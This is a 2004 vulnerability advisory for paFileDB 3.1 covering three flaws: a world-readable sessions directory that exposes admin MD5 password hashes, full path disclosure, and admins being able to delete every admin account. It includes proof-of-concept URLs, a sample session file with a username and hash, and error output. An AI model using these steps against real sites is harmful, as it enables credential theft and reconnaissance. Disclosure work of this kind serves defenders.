ECHO_ADV_09$2004 --------------------------------------------------------------------------- Multiple Vulnerabilities in paFileDB 3.1 --------------------------------------------------------------------------- Author: y3dips Date: November, 26th 2004 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv09-y3dips-2004.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ paFileDB 3.1 ( PHP ARENA ) Written by Todd ( todd@phparena.net ) web : http://www.phparena.net --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ 1. Possible to see Admin Hash Password if using sessions method If the site using sessions to handle the authentication in the site, Attacker could access the directory "sessions" and see the sessions in the same time when the admin log in to manage the site (which is include admin hash password) ----- snip from manual page ----- In order to reduce compatibility problems, paFileDB 3.0 Final can use either sessions or cookies. Cookies are recommended and enabled by default, because there's less compatibility issues and unlike sessions, cookies don't require any data to be stored on the server. ... To switch between sessions and cookies, open up pafiledb.php and look for the text: $authmethod = "cookies"; OR : $authmethod = "sessions"; ... Before you make the switch to sessions, make a directory called "sessions" in your paFileDB folder (same folder as pafiledb.php) and CHMOD the directory 777. ----- snip ------ POC Scenario : * admin (dudul) log in to manage the site at http://URL/pafiledb/pafiledb.php?action=admin ,then the session is recorded in sessions directory + attacker access the directory directly and see the "sessions" (in a same time) Exploit: http://URL/pafiledb/sessions/[sessionfile] then access the listing sessions file example : 'sess_12c9d926184e836451a15ed837bb875d' which is contain user|s:5:"dudul";pass|s:32:"810f9f3fbad17446a22ed2e516a12c36"; ip|s:32:"f528764d624db129b32c21fbca0cb8d6"; ---- info that attacker get ---- user : dudul pass : 810f9f3fbad17446a22ed2e516a12c36 <-- MD5 ---------------------------------------------------------------------------- 2. Full path disclosure A remote user can access the file directly to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. read my artikel about path disclosure with Indonesian language at http://ezine.echo.or.id/ezine8/ez-r08-y3dips-pathdisc.txt POC : http://URL/pafiledb/includes/admin/admins.php Fatal error: Call to undefined function: adlocbar() in /var/www/html/pafiledb/includes/admin/admins.php on line 13 http://URL/pafiledb/includes/admin/category.php Fatal error: Call to undefined function: adlocbar() in /var/www/html/pafiledb/includes/admin/category.php on line 232 http://URL/pafiledb/includes/team.php Warning: main(./includes/team/login.php): failed to open stream: No such file or directory in /var/www/html/pafiledb/includes/team.php on line 17 Warning: main(): Failed opening './includes/team/login.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/pafiledb/includes/team.php on line 17 - - - - - - - - - - FIX it : For User and do not know how to fix the script , change php.ini file setting then turn on log_errors , and turn off display_error ---------------------------------------------------------------------------- 3. Possible to Have No Admin Account All admin have same power, so every admin could delete another admin until there is no admin left , if all admin acount deleted, so all admin could not log in to manage the site ---------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o & #aikmel @DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------